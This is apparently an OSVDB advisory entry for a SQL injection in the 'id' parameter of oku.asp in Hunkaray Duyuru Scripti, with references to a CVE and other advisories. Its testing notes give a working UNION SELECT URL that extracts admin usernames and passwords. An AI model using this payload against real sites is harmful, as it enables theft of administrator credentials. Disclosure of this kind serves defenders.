Hunkaray Duyuru Scripti oku.asp id Variable SQL Injection

2007-01-31T00:24:28
ID OSVDB:34086
Type osvdb
Reporter OSVDB
Modified 2007-01-31T00:24:28

Description

Manual Testing Notes

http://[target]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin

References:

ISS X-Force ID: 32042 Generic Exploit URL: http://milw0rm.com/exploits/3241 FrSIRT Advisory: ADV-2007-0446 CVE-2007-0688